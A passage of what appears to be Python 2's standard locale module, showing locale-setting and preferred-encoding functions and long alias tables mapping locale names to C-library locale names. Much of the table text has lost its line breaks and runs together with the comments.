    localename = _setlocale(category)
    if category == LC_ALL and ';' in localename:
        raise TypeError, 'category LC_ALL is not supported'
    return _parse_localename(localename)

def setlocale(category, locale=None):

    """ Set the locale for the given category.  The locale can be
        a string, a locale tuple (language code, encoding), or None.

        Locale tuples are converted to strings using the locale
        aliasing engine.  Locale strings are passed directly to the C
        lib.

        category may be given as one of the LC_* values.

    """
    if locale and type(locale) is not type(""):
        # convert to string
        locale = normalize(_build_localename(locale))
    return _setlocale(category, locale)

def resetlocale(category=LC_ALL):

    """ Sets the locale for category to the default setting.

        The default setting is determined by calling
        getdefaultlocale(). category defaults to LC_ALL.

    """
    _setlocale(category, _build_localename(getdefaultlocale()))

if sys.platform.startswith("win"):
    # On Win32, this will return the ANSI code page
    def getpreferredencoding(do_setlocale = True):
        """Return the charset that the user is likely using."""
        import _locale
        return _locale._getdefaultlocale()[1]
else:
    # On Unix, if CODESET is available, use that.
    try:
        CODESET
    except NameError:
        # Fall back to parsing environment variables :-(
        def getpreferredencoding(do_setlocale = True):
            """Return the charset that the user is likely using,
            by looking at environment variables."""
            return getdefaultlocale()[1]
    else:
        def getpreferredencoding(do_setlocale = True):
            """Return the charset that the user is likely using,
            according to the system configuration."""
            if do_setlocale:
                oldloc = setlocale(LC_CTYPE)
                try:
                    setlocale(LC_CTYPE, "")
                except Error:
                    pass
                result = nl_langinfo(CODESET)
                setlocale(LC_CTYPE, oldloc)
                return result
            else:
                return nl_langinfo(CODESET)

### Database
#
# The following data was extracted from the locale.alias file which
# comes with X11 and then hand edited removing the explicit encoding
# definitions and adding some more aliases. The file is usually
# available as /usr/lib/X11/locale/locale.alias.
#

#
# The local_encoding_alias table maps lowercase encoding alias names
# to C locale encoding names (case-sensitive). Note that normalize()
# first looks up the encoding in the encodings.aliases dictionary and
# then applies this mapping to find the correct C lib name for the
# encoding.
# locale_encoding_alias = { # Mappings for non-standard encoding names used in locale names '437': 'C', 'c': 'C', 'en': 'ISO8859-1', 'jis': 'JIS7', 'jis7': 'JIS7', 'ajec': 'eucJP', # Mappings from Python codec names to C lib encoding names 'ascii': 'ISO8859-1', 'latin_1': 'ISO8859-1', 'iso8859_1': 'ISO8859-1', 'iso8859_10': 'ISO8859-10', 'iso8859_11': 'ISO8859-11', 'iso8859_13': 'ISO8859-13', 'iso8859_14': 'ISO8859-14', 'iso8859_15': 'ISO8859-15', 'iso8859_16': 'ISO8859-16', 'iso8859_2': 'ISO8859-2', 'iso8859_3': 'ISO8859-3', 'iso8859_4': 'ISO8859-4', 'iso8859_5': 'ISO8859-5', 'iso8859_6': 'ISO8859-6', 'iso8859_7': 'ISO8859-7', 'iso8859_8': 'ISO8859-8', 'iso8859_9': 'ISO8859-9', 'iso2022_jp': 'JIS7', 'shift_jis': 'SJIS', 'tactis': 'TACTIS', 'euc_jp': 'eucJP', 'euc_kr': 'eucKR', 'utf_8': 'UTF-8', 'koi8_r': 'KOI8-R', 'koi8_u': 'KOI8-U', # XXX This list is still incomplete. If you know more # mappings, please file a bug report. Thanks. } # # The locale_alias table maps lowercase alias names to C locale names # (case-sensitive). Encodings are always separated from the locale # name using a dot ('.'); they should only be given in case the # language name is needed to interpret the given encoding alias # correctly (CJK codes often have this need). # # Note that the normalize() function which uses this tables # removes '_' and '-' characters from the encoding part of the # locale name before doing the lookup. This saves a lot of # space in the table. # # MAL 2004-12-10: # Updated alias mapping to most recent locale.alias file # from X.org distribution using makelocalealias.py. 
# # These are the differences compared to the old mapping (Python 2.4 # and older): # # updated 'bg' -> 'bg_BG.ISO8859-5' to 'bg_BG.CP1251' # updated 'bg_bg' -> 'bg_BG.ISO8859-5' to 'bg_BG.CP1251' # updated 'bulgarian' -> 'bg_BG.ISO8859-5' to 'bg_BG.CP1251' # updated 'cz' -> 'cz_CZ.ISO8859-2' to 'cs_CZ.ISO8859-2' # updated 'cz_cz' -> 'cz_CZ.ISO8859-2' to 'cs_CZ.ISO8859-2' # updated 'czech' -> 'cs_CS.ISO8859-2' to 'cs_CZ.ISO8859-2' # updated 'dutch' -> 'nl_BE.ISO8859-1' to 'nl_NL.ISO8859-1' # updated 'et' -> 'et_EE.ISO8859-4' to 'et_EE.ISO8859-15' # updated 'et_ee' -> 'et_EE.ISO8859-4' to 'et_EE.ISO8859-15' # updated 'fi' -> 'fi_FI.ISO8859-1' to 'fi_FI.ISO8859-15' # updated 'fi_fi' -> 'fi_FI.ISO8859-1' to 'fi_FI.ISO8859-15' # updated 'iw' -> 'iw_IL.ISO8859-8' to 'he_IL.ISO8859-8' # updated 'iw_il' -> 'iw_IL.ISO8859-8' to 'he_IL.ISO8859-8' # updated 'japanese' -> 'ja_JP.SJIS' to 'ja_JP.eucJP' # updated 'lt' -> 'lt_LT.ISO8859-4' to 'lt_LT.ISO8859-13' # updated 'lv' -> 'lv_LV.ISO8859-4' to 'lv_LV.ISO8859-13' # updated 'sl' -> 'sl_CS.ISO8859-2' to 'sl_SI.ISO8859-2' # updated 'slovene' -> 'sl_CS.ISO8859-2' to 'sl_SI.ISO8859-2' # updated 'th_th' -> 'th_TH.TACTIS' to 'th_TH.ISO8859-11' # updated 'zh_cn' -> 'zh_CN.eucCN' to 'zh_CN.gb2312' # updated 'zh_cn.big5' -> 'zh_TW.eucTW' to 'zh_TW.big5' # updated 'zh_tw' -> 'zh_TW.eucTW' to 'zh_TW.big5' # # MAL 2008-05-30: # Updated alias mapping to most recent locale.alias file # from X.org distribution using makelocalealias.py. 
# # These are the differences compared to the old mapping (Python 2.5 # and older): # # updated 'cs_cs.iso88592' -> 'cs_CZ.ISO8859-2' to 'cs_CS.ISO8859-2' # updated 'serbocroatian' -> 'sh_YU.ISO8859-2' to 'sr_CS.ISO8859-2' # updated 'sh' -> 'sh_YU.ISO8859-2' to 'sr_CS.ISO8859-2' # updated 'sh_hr.iso88592' -> 'sh_HR.ISO8859-2' to 'hr_HR.ISO8859-2' # updated 'sh_sp' -> 'sh_YU.ISO8859-2' to 'sr_CS.ISO8859-2' # updated 'sh_yu' -> 'sh_YU.ISO8859-2' to 'sr_CS.ISO8859-2' # updated 'sp' -> 'sp_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sp_yu' -> 'sp_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sr' -> 'sr_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sr@cyrillic' -> 'sr_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sr_sp' -> 'sr_SP.ISO8859-2' to 'sr_CS.ISO8859-2' # updated 'sr_yu' -> 'sr_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sr_yu.cp1251@cyrillic' -> 'sr_YU.CP1251' to 'sr_CS.CP1251' # updated 'sr_yu.iso88592' -> 'sr_YU.ISO8859-2' to 'sr_CS.ISO8859-2' # updated 'sr_yu.iso88595' -> 'sr_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sr_yu.iso88595@cyrillic' -> 'sr_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # updated 'sr_yu.microsoftcp1251@cyrillic' -> 'sr_YU.CP1251' to 'sr_CS.CP1251' # updated 'sr_yu.utf8@cyrillic' -> 'sr_YU.UTF-8' to 'sr_CS.UTF-8' # updated 'sr_yu@cyrillic' -> 'sr_YU.ISO8859-5' to 'sr_CS.ISO8859-5' # # AP 2010-04-12: # Updated alias mapping to most recent locale.alias file # from X.org distribution using makelocalealias.py. 
# # These are the differences compared to the old mapping (Python 2.6.5 # and older): # # updated 'ru' -> 'ru_RU.ISO8859-5' to 'ru_RU.UTF-8' # updated 'ru_ru' -> 'ru_RU.ISO8859-5' to 'ru_RU.UTF-8' # updated 'serbocroatian' -> 'sr_CS.ISO8859-2' to 'sr_RS.UTF-8@latin' # updated 'sh' -> 'sr_CS.ISO8859-2' to 'sr_RS.UTF-8@latin' # updated 'sh_yu' -> 'sr_CS.ISO8859-2' to 'sr_RS.UTF-8@latin' # updated 'sr' -> 'sr_CS.ISO8859-5' to 'sr_RS.UTF-8' # updated 'sr@cyrillic' -> 'sr_CS.ISO8859-5' to 'sr_RS.UTF-8' # updated 'sr@latn' -> 'sr_CS.ISO8859-2' to 'sr_RS.UTF-8@latin' # updated 'sr_cs.utf8@latn' -> 'sr_CS.UTF-8' to 'sr_RS.UTF-8@latin' # updated 'sr_cs@latn' -> 'sr_CS.ISO8859-2' to 'sr_RS.UTF-8@latin' # updated 'sr_yu' -> 'sr_CS.ISO8859-5' to 'sr_RS.UTF-8@latin' # updated 'sr_yu.utf8@cyrillic' -> 'sr_CS.UTF-8' to 'sr_RS.UTF-8' # updated 'sr_yu@cyrillic' -> 'sr_CS.ISO8859-5' to 'sr_RS.UTF-8' # locale_alias = { 'a3': 'a3_AZ.KOI8-C', 'a3_az': 'a3_AZ.KOI8-C', 'a3_az.koi8c': 'a3_AZ.KOI8-C', 'af': 'af_ZA.ISO8859-1', 'af_za': 'af_ZA.ISO8859-1', 'af_za.iso88591': 'af_ZA.ISO8859-1', 'am': 'am_ET.UTF-8', 'am_et': 'am_ET.UTF-8', 'american': 'en_US.ISO8859-1', 'american.iso88591': 'en_US.ISO8859-1', 'ar': 'ar_AA.ISO8859-6', 'ar_aa': 'ar_AA.ISO8859-6', 'ar_aa.iso88596': 'ar_AA.ISO8859-6', 'ar_ae': 'ar_AE.ISO8859-6', 'ar_ae.iso88596': 'ar_AE.ISO8859-6', 'ar_bh': 'ar_BH.ISO8859-6', 'ar_bh.iso88596': 'ar_BH.ISO8859-6', 'ar_dz': 'ar_DZ.ISO8859-6', 'ar_dz.iso88596': 'ar_DZ.ISO8859-6', 'ar_eg': 'ar_EG.ISO8859-6', 'ar_eg.iso88596': 'ar_EG.ISO8859-6', 'ar_iq': 'ar_IQ.ISO8859-6', 'ar_iq.iso88596': 'ar_IQ.ISO8859-6', 'ar_jo': 'ar_JO.ISO8859-6', 'ar_jo.iso88596': 'ar_JO.ISO8859-6', 'ar_kw': 'ar_KW.ISO8859-6', 'ar_kw.iso88596': 'ar_KW.ISO8859-6', 'ar_lb': 'ar_LB.ISO8859-6', 'ar_lb.iso88596': 'ar_LB.ISO8859-6', 'ar_ly': 'ar_LY.ISO8859-6', 'ar_ly.iso88596': 'ar_LY.ISO8859-6', 'ar_ma': 'ar_MA.ISO8859-6', 'ar_ma.iso88596': 'ar_MA.ISO8859-6', 'ar_om': 'ar_OM.ISO8859-6', 'ar_om.iso88596': 
'ar_OM.ISO8859-6', 'ar_qa': 'ar_QA.ISO8859-6', 'ar_qa.iso88596': 'ar_QA.ISO8859-6', 'ar_sa': 'ar_SA.ISO8859-6', 'ar_sa.iso88596': 'ar_SA.ISO8859-6', 'ar_sd': 'ar_SD.ISO8859-6', 'ar_sd.iso88596': 'ar_SD.ISO8859-6', 'ar_sy': 'ar_SY.ISO8859-6', 'ar_sy.iso88596': 'ar_SY.ISO8859-6', 'ar_tn': 'ar_TN.ISO8859-6', 'ar_tn.iso88596': 'ar_TN.ISO8859-6', 'ar_ye': 'ar_YE.ISO8859-6', 'ar_ye.iso88596': 'ar_YE.ISO8859-6', 'arabic': 'ar_AA.ISO8859-6', 'arabic.iso88596': 'ar_AA.ISO8859-6', 'as': 'as_IN.UTF-8', 'az': 'az_AZ.ISO8859-9E', 'az_az': 'az_AZ.ISO8859-9E', 'az_az.iso88599e': 'az_AZ.ISO8859-9E', 'be': 'be_BY.CP1251', 'be@latin': 'be_BY.UTF-8@latin', 'be_by': 'be_BY.CP1251', 'be_by.cp1251': 'be_BY.CP1251', 'be_by.microsoftcp1251': 'be_BY.CP1251', 'be_by.utf8@latin': 'be_BY.UTF-8@latin', 'be_by@latin': 'be_BY.UTF-8@latin', 'bg': 'bg_BG.CP1251', 'bg_bg': 'bg_BG.CP1251', 'bg_bg.cp1251': 'bg_BG.CP1251', 'bg_bg.iso88595': 'bg_BG.ISO8859-5', 'bg_bg.koi8r': 'bg_BG.KOI8-R', 'bg_bg.microsoftcp1251': 'bg_BG.CP1251', 'bn_in': 'bn_IN.UTF-8', 'bokmal': 'nb_NO.ISO8859-1', 'bokm\xe5l': 'nb_NO.ISO8859-1', 'br': 'br_FR.ISO8859-1', 'br_fr': 'br_FR.ISO8859-1', 'br_fr.iso88591': 'br_FR.ISO8859-1', 'br_fr.iso885914': 'br_FR.ISO8859-14', 'br_fr.iso885915': 'br_FR.ISO8859-15', 'br_fr.iso885915@euro': 'br_FR.ISO8859-15', 'br_fr.utf8@euro': 'br_FR.UTF-8', 'br_fr@euro': 'br_FR.ISO8859-15', 'bs': 'bs_BA.ISO8859-2', 'bs_ba': 'bs_BA.ISO8859-2', 'bs_ba.iso88592': 'bs_BA.ISO8859-2', 'bulgarian': 'bg_BG.CP1251', 'c': 'C', 'c-french': 'fr_CA.ISO8859-1', 'c-french.iso88591': 'fr_CA.ISO8859-1', 'c.en': 'C', 'c.iso88591': 'en_US.ISO8859-1', 'c_c': 'C', 'c_c.c': 'C', 'ca': 'ca_ES.ISO8859-1', 'ca_ad': 'ca_AD.ISO8859-1', 'ca_ad.iso88591': 'ca_AD.ISO8859-1', 'ca_ad.iso885915': 'ca_AD.ISO8859-15', 'ca_ad.iso885915@euro': 'ca_AD.ISO8859-15', 'ca_ad.utf8@euro': 'ca_AD.UTF-8', 'ca_ad@euro': 'ca_AD.ISO8859-15', 'ca_es': 'ca_ES.ISO8859-1', 'ca_es.iso88591': 'ca_ES.ISO8859-1', 'ca_es.iso885915': 'ca_ES.ISO8859-15', 
'ca_es.iso885915@euro': 'ca_ES.ISO8859-15', 'ca_es.utf8@euro': 'ca_ES.UTF-8', 'ca_es@euro': 'ca_ES.ISO8859-15', 'ca_fr': 'ca_FR.ISO8859-1', 'ca_fr.iso88591': 'ca_FR.ISO8859-1', 'ca_fr.iso885915': 'ca_FR.ISO8859-15', 'ca_fr.iso885915@euro': 'ca_FR.ISO8859-15', 'ca_fr.utf8@euro': 'ca_FR.UTF-8', 'ca_fr@euro': 'ca_FR.ISO8859-15', 'ca_it': 'ca_IT.ISO8859-1', 'ca_it.iso88591': 'ca_IT.ISO8859-1', 'ca_it.iso885915': 'ca_IT.ISO8859-15', 'ca_it.iso885915@euro': 'ca_IT.ISO8859-15', 'ca_it.utf8@euro': 'ca_IT.UTF-8', 'ca_it@euro': 'ca_IT.ISO8859-15', 'catalan': 'ca_ES.ISO8859-1', 'cextend': 'en_US.ISO8859-1', 'cextend.en': 'en_US.ISO8859-1', 'chinese-s': 'zh_CN.eucCN', 'chinese-t': 'zh_TW.eucTW', 'croatian': 'hr_HR.ISO8859-2', 'cs': 'cs_CZ.ISO8859-2', 'cs_cs': 'cs_CZ.ISO8859-2', 'cs_cs.iso88592': 'cs_CS.ISO8859-2', 'cs_cz': 'cs_CZ.ISO8859-2', 'cs_cz.iso88592': 'cs_CZ.ISO8859-2', 'cy': 'cy_GB.ISO8859-1', 'cy_gb': 'cy_GB.ISO8859-1', 'cy_gb.iso88591': 'cy_GB.ISO8859-1', 'cy_gb.iso885914': 'cy_GB.ISO8859-14', 'cy_gb.iso885915': 'cy_GB.ISO8859-15', 'cy_gb@euro': 'cy_GB.ISO8859-15', 'cz': 'cs_CZ.ISO8859-2', 'cz_cz': 'cs_CZ.ISO8859-2', 'czech': 'cs_CZ.ISO8859-2', 'da': 'da_DK.ISO8859-1', 'da.iso885915': 'da_DK.ISO8859-15', 'da_dk': 'da_DK.ISO8859-1', 'da_dk.88591': 'da_DK.ISO8859-1', 'da_dk.885915': 'da_DK.ISO8859-15', 'da_dk.iso88591': 'da_DK.ISO8859-1', 'da_dk.iso885915': 'da_DK.ISO8859-15', 'da_dk@euro': 'da_DK.ISO8859-15', 'danish': 'da_DK.ISO8859-1', 'danish.iso88591': 'da_DK.ISO8859-1', 'dansk': 'da_DK.ISO8859-1', 'de': 'de_DE.ISO8859-1', 'de.iso885915': 'de_DE.ISO8859-15', 'de_at': 'de_AT.ISO8859-1', 'de_at.iso88591': 'de_AT.ISO8859-1', 'de_at.iso885915': 'de_AT.ISO8859-15', 'de_at.iso885915@euro': 'de_AT.ISO8859-15', 'de_at.utf8@euro': 'de_AT.UTF-8', 'de_at@euro': 'de_AT.ISO8859-15', 'de_be': 'de_BE.ISO8859-1', 'de_be.iso88591': 'de_BE.ISO8859-1', 'de_be.iso885915': 'de_BE.ISO8859-15', 'de_be.iso885915@euro': 'de_BE.ISO8859-15', 'de_be.utf8@euro': 'de_BE.UTF-8', 'de_be@euro': 
'de_BE.ISO8859-15', 'de_ch': 'de_CH.ISO8859-1', 'de_ch.iso88591': 'de_CH.ISO8859-1', 'de_ch.iso885915': 'de_CH.ISO8859-15', 'de_ch@euro': 'de_CH.ISO8859-15', 'de_de': 'de_DE.ISO8859-1', 'de_de.88591': 'de_DE.ISO8859-1', 'de_de.885915': 'de_DE.ISO8859-15', 'de_de.885915@euro': 'de_DE.ISO8859-15', 'de_de.iso88591': 'de_DE.ISO8859-1', 'de_de.iso885915': 'de_DE.ISO8859-15', 'de_de.iso885915@euro': 'de_DE.ISO8859-15', 'de_de.utf8@euro': 'de_DE.UTF-8', 'de_de@euro': 'de_DE.ISO8859-15', 'de_lu': 'de_LU.ISO8859-1', 'de_lu.iso88591': 'de_LU.ISO8859-1', 'de_lu.iso885915': 'de_LU.ISO8859-15', 'de_lu.iso885915@euro': 'de_LU.ISO8859-15', 'de_lu.utf8@euro': 'de_LU.UTF-8', 'de_lu@euro': 'de_LU.ISO8859-15', 'deutsch': 'de_DE.ISO8859-1', 'dutch': 'nl_NL.ISO8859-1', 'dutch.iso88591': 'nl_BE.ISO8859-1', 'ee': 'ee_EE.ISO8859-4', 'ee_ee': 'ee_EE.ISO8859-4', 'ee_ee.iso88594': 'ee_EE.ISO8859-4', 'eesti': 'et_EE.ISO8859-1', 'el': 'el_GR.ISO8859-7', 'el_gr': 'el_GR.ISO8859-7', 'el_gr.iso88597': 'el_GR.ISO8859-7', 'el_gr@euro': 'el_GR.ISO8859-15', 'en': 'en_US.ISO8859-1', 'en.iso88591': 'en_US.ISO8859-1', 'en_au': 'en_AU.ISO8859-1', 'en_au.iso88591': 'en_AU.ISO8859-1', 'en_be': 'en_BE.ISO8859-1', 'en_be@euro': 'en_BE.ISO8859-15', 'en_bw': 'en_BW.ISO8859-1', 'en_bw.iso88591': 'en_BW.ISO8859-1', 'en_ca': 'en_CA.ISO8859-1', 'en_ca.iso88591': 'en_CA.ISO8859-1', 'en_gb': 'en_GB.ISO8859-1', 'en_gb.88591': 'en_GB.ISO8859-1', 'en_gb.iso88591': 'en_GB.ISO8859-1', 'en_gb.iso885915': 'en_GB.ISO8859-15', 'en_gb@euro': 'en_GB.ISO8859-15', 'en_hk': 'en_HK.ISO8859-1', 'en_hk.iso88591': 'en_HK.ISO8859-1', 'en_ie': 'en_IE.ISO8859-1', 'en_ie.iso88591': 'en_IE.ISO8859-1', 'en_ie.iso885915': 'en_IE.ISO8859-15', 'en_ie.iso885915@euro': 'en_IE.ISO8859-15', 'en_ie.utf8@euro': 'en_IE.UTF-8', 'en_ie@euro': 'en_IE.ISO8859-15', 'en_in': 'en_IN.ISO8859-1', 'en_nz': 'en_NZ.ISO8859-1', 'en_nz.iso88591': 'en_NZ.ISO8859-1', 'en_ph': 'en_PH.ISO8859-1', 'en_ph.iso88591': 'en_PH.ISO8859-1', 'en_sg': 'en_SG.ISO8859-1', 
'en_sg.iso88591': 'en_SG.ISO8859-1', 'en_uk': 'en_GB.ISO8859-1', 'en_us': 'en_US.ISO8859-1', 'en_us.88591': 'en_US.ISO8859-1', 'en_us.885915': 'en_US.ISO8859-15', 'en_us.iso88591': 'en_US.ISO8859-1', 'en_us.iso885915': 'en_US.ISO8859-15', 'en_us.iso885915@euro': 'en_US.ISO8859-15', 'en_us@euro': 'en_US.ISO8859-15', 'en_us@euro@euro': 'en_US.ISO8859-15', 'en_za': 'en_ZA.ISO8859-1', 'en_za.88591': 'en_ZA.ISO8859-1', 'en_za.iso88591': 'en_ZA.ISO8859-1', 'en_za.iso885915': 'en_ZA.ISO8859-15', 'en_za@euro': 'en_ZA.ISO8859-15', 'en_zw': 'en_ZW.ISO8859-1', 'en_zw.iso88591': 'en_ZW.ISO8859-1', 'eng_gb': 'en_GB.ISO8859-1', 'eng_gb.8859': 'en_GB.ISO8859-1', 'english': 'en_EN.ISO8859-1', 'english.iso88591': 'en_EN.ISO8859-1', 'english_uk': 'en_GB.ISO8859-1', 'english_uk.8859': 'en_GB.ISO8859-1', 'english_united-states': 'en_US.ISO8859-1', 'english_united-states.437': 'C', 'english_us': 'en_US.ISO8859-1', 'english_us.8859': 'en_US.ISO8859-1', 'english_us.ascii': 'en_US.ISO8859-1', 'eo': 'eo_XX.ISO8859-3', 'eo_eo': 'eo_EO.ISO8859-3', 'eo_eo.iso88593': 'eo_EO.ISO8859-3', 'eo_xx': 'eo_XX.ISO8859-3', 'eo_xx.iso88593': 'eo_XX.ISO8859-3', 'es': 'es_ES.ISO8859-1', 'es_ar': 'es_AR.ISO8859-1', 'es_ar.iso88591': 'es_AR.ISO8859-1', 'es_bo': 'es_BO.ISO8859-1', 'es_bo.iso88591': 'es_BO.ISO8859-1', 'es_cl': 'es_CL.ISO8859-1', 'es_cl.iso88591': 'es_CL.ISO8859-1', 'es_co': 'es_CO.ISO8859-1', 'es_co.iso88591': 'es_CO.ISO8859-1', 'es_cr': 'es_CR.ISO8859-1', 'es_cr.iso88591': 'es_CR.ISO8859-1', 'es_do': 'es_DO.ISO8859-1', 'es_do.iso88591': 'es_DO.ISO8859-1', 'es_ec': 'es_EC.ISO8859-1', 'es_ec.iso88591': 'es_EC.ISO8859-1', 'es_es': 'es_ES.ISO8859-1', 'es_es.88591': 'es_ES.ISO8859-1', 'es_es.iso88591': 'es_ES.ISO8859-1', 'es_es.iso885915': 'es_ES.ISO8859-15', 'es_es.iso885915@euro': 'es_ES.ISO8859-15', 'es_es.utf8@euro': 'es_ES.UTF-8', 'es_es@euro': 'es_ES.ISO8859-15', 'es_gt': 'es_GT.ISO8859-1', 'es_gt.iso88591': 'es_GT.ISO8859-1', 'es_hn': 'es_HN.ISO8859-1', 'es_hn.iso88591': 'es_HN.ISO8859-1', 
'es_mx': 'es_MX.ISO8859-1', 'es_mx.iso88591': 'es_MX.ISO8859-1', 'es_ni': 'es_NI.ISO8859-1', 'es_ni.iso88591': 'es_NI.ISO8859-1', 'es_pa': 'es_PA.ISO8859-1', 'es_pa.iso88591': 'es_PA.ISO8859-1', 'es_pa.iso885915': 'es_PA.ISO8859-15', 'es_pa@euro': 'es_PA.ISO8859-15', 'es_pe': 'es_PE.ISO8859-1', 'es_pe.iso88591': 'es_PE.ISO8859-1', 'es_pe.iso885915': 'es_PE.ISO8859-15', 'es_pe@euro': 'es_PE.ISO8859-15', 'es_pr': 'es_PR.ISO8859-1', 'es_pr.iso88591': 'es_PR.ISO8859-1', 'es_py': 'es_PY.ISO8859-1', 'es_py.iso88591': 'es_PY.ISO8859-1', 'es_py.iso885915': 'es_PY.ISO8859-15', 'es_py@euro': 'es_PY.ISO8859-15', 'es_sv': 'es_SV.ISO8859-1', 'es_sv.iso88591': 'es_SV.ISO8859-1', 'es_sv.iso885915': 'es_SV.ISO8859-15', 'es_sv@euro': 'es_SV.ISO8859-15', 'es_us': 'es_US.ISO8859-1', 'es_us.iso88591': 'es_US.ISO8859-1', 'es_uy': 'es_UY.ISO8859-1', 'es_uy.iso88591': 'es_UY.ISO8859-1', 'es_uy.iso885915': 'es_UY.ISO8859-15', 'es_uy@euro': 'es_UY.ISO8859-15', 'es_ve': 'es_VE.ISO8859-1', 'es_ve.iso88591': 'es_VE.ISO8859-1', 'es_ve.iso885915': 'es_VE.ISO8859-15', 'es_ve@euro': 'es_VE.ISO8859-15', 'estonian': 'et_EE.ISO8859-1', 'et': 'et_EE.ISO8859-15', 'et_ee': 'et_EE.ISO8859-15', 'et_ee.iso88591': 'et_EE.ISO8859-1', 'et_ee.iso885913': 'et_EE.ISO8859-13', 'et_ee.iso885915': 'et_EE.ISO8859-15', 'et_ee.iso88594': 'et_EE.ISO8859-4', 'et_ee@euro': 'et_EE.ISO8859-15', 'eu': 'eu_ES.ISO8859-1', 'eu_es': 'eu_ES.ISO8859-1', 'eu_es.iso88591': 'eu_ES.ISO8859-1', 'eu_es.iso885915': 'eu_ES.ISO8859-15', 'eu_es.iso885915@euro': 'eu_ES.ISO8859-15', 'eu_es.utf8@euro': 'eu_ES.UTF-8', 'eu_es@euro': 'eu_ES.ISO8859-15', 'fa': 'fa_IR.UTF-8', 'fa_ir': 'fa_IR.UTF-8', 'fa_ir.isiri3342': 'fa_IR.ISIRI-3342', 'fi': 'fi_FI.ISO8859-15', 'fi.iso885915': 'fi_FI.ISO8859-15', 'fi_fi': 'fi_FI.ISO8859-15', 'fi_fi.88591': 'fi_FI.ISO8859-1', 'fi_fi.iso88591': 'fi_FI.ISO8859-1', 'fi_fi.iso885915': 'fi_FI.ISO8859-15', 'fi_fi.iso885915@euro': 'fi_FI.ISO8859-15', 'fi_fi.utf8@euro': 'fi_FI.UTF-8', 'fi_fi@euro': 'fi_FI.ISO8859-15', 
'finnish': 'fi_FI.ISO8859-1', 'finnish.iso88591': 'fi_FI.ISO8859-1', 'fo': 'fo_FO.ISO8859-1', 'fo_fo': 'fo_FO.ISO8859-1', 'fo_fo.iso88591': 'fo_FO.ISO8859-1', 'fo_fo.iso885915': 'fo_FO.ISO8859-15', 'fo_fo@euro': 'fo_FO.ISO8859-15', 'fr': 'fr_FR.ISO8859-1', 'fr.iso885915': 'fr_FR.ISO8859-15', 'fr_be': 'fr_BE.ISO8859-1', 'fr_be.88591': 'fr_BE.ISO8859-1', 'fr_be.iso88591': 'fr_BE.ISO8859-1', 'fr_be.iso885915': 'fr_BE.ISO8859-15', 'fr_be.iso885915@euro': 'fr_BE.ISO8859-15', 'fr_be.utf8@euro': 'fr_BE.UTF-8', 'fr_be@euro': 'fr_BE.ISO8859-15', 'fr_ca': 'fr_CA.ISO8859-1', 'fr_ca.88591': 'fr_CA.ISO8859-1', 'fr_ca.iso88591': 'fr_CA.ISO8859-1', 'fr_ca.iso885915': 'fr_CA.ISO8859-15', 'fr_ca@euro': 'fr_CA.ISO8859-15', 'fr_ch': 'fr_CH.ISO8859-1', 'fr_ch.88591': 'fr_CH.ISO8859-1', 'fr_ch.iso88591': 'fr_CH.ISO8859-1', 'fr_ch.iso885915': 'fr_CH.ISO8859-15', 'fr_ch@euro': 'fr_CH.ISO8859-15', 'fr_fr': 'fr_FR.ISO8859-1', 'fr_fr.88591': 'fr_FR.ISO8859-1', 'fr_fr.iso88591': 'fr_FR.ISO8859-1', 'fr_fr.iso885915': 'fr_FR.ISO8859-15', 'fr_fr.iso885915@euro': 'fr_FR.ISO8859-15', 'fr_fr.utf8@euro': 'fr_FR.UTF-8', 'fr_fr@euro': 'fr_FR.ISO8859-15', 'fr_lu': 'fr_LU.ISO8859-1', 'fr_lu.88591': 'fr_LU.ISO8859-1', 'fr_lu.iso88591': 'fr_LU.ISO8859-1', 'fr_lu.iso885915': 'fr_LU.ISO8859-15', 'fr_lu.iso885915@euro': 'fr_LU.ISO8859-15', 'fr_lu.utf8@euro': 'fr_LU.UTF-8', 'fr_lu@euro': 'fr_LU.ISO8859-15', 'fran\xe7ais': 'fr_FR.ISO8859-1', 'fre_fr': 'fr_FR.ISO8859-1', 'fre_fr.8859': 'fr_FR.ISO8859-1', 'french': 'fr_FR.ISO8859-1', 'french.iso88591': 'fr_CH.ISO8859-1', 'french_france': 'fr_FR.ISO8859-1', 'french_france.8859': 'fr_FR.ISO8859-1', 'ga': 'ga_IE.ISO8859-1', 'ga_ie': 'ga_IE.ISO8859-1', 'ga_ie.iso88591': 'ga_IE.ISO8859-1', 'ga_ie.iso885914': 'ga_IE.ISO8859-14', 'ga_ie.iso885915': 'ga_IE.ISO8859-15', 'ga_ie.iso885915@euro': 'ga_IE.ISO8859-15', 'ga_ie.utf8@euro': 'ga_IE.UTF-8', 'ga_ie@euro': 'ga_IE.ISO8859-15', 'galego': 'gl_ES.ISO8859-1', 'galician': 'gl_ES.ISO8859-1', 'gd': 'gd_GB.ISO8859-1', 
'gd_gb': 'gd_GB.ISO8859-1', 'gd_gb.iso88591': 'gd_GB.ISO8859-1', 'gd_gb.iso885914': 'gd_GB.ISO8859-14', 'gd_gb.iso885915': 'gd_GB.ISO8859-15', 'gd_gb@euro': 'gd_GB.ISO8859-15', 'ger_de': 'de_DE.ISO8859-1', 'ger_de.8859': 'de_DE.ISO8859-1', 'german': 'de_DE.ISO8859-1', 'german.iso88591': 'de_CH.ISO8859-1', 'german_germany': 'de_DE.ISO8859-1', 'german_germany.8859': 'de_DE.ISO8859-1', 'gl': 'gl_ES.ISO8859-1', 'gl_es': 'gl_ES.ISO8859-1', 'gl_es.iso88591': 'gl_ES.ISO8859-1', 'gl_es.iso885915': 'gl_ES.ISO8859-15', 'gl_es.iso885915@euro': 'gl_ES.ISO8859-15', 'gl_es.utf8@euro': 'gl_ES.UTF-8', 'gl_es@euro': 'gl_ES.ISO8859-15', 'greek': 'el_GR.ISO8859-7', 'greek.iso88597': 'el_GR.ISO8859-7', 'gu_in': 'gu_IN.UTF-8', 'gv': 'gv_GB.ISO8859-1', 'gv_gb': 'gv_GB.ISO8859-1', 'gv_gb.iso88591': 'gv_GB.ISO8859-1', 'gv_gb.iso885914': 'gv_GB.ISO8859-14', 'gv_gb.iso885915': 'gv_GB.ISO8859-15', 'gv_gb@euro': 'gv_GB.ISO8859-15', 'he': 'he_IL.ISO8859-8', 'he_il': 'he_IL.ISO8859-8', 'he_il.cp1255': 'he_IL.CP1255', 'he_il.iso88598': 'he_IL.ISO8859-8', 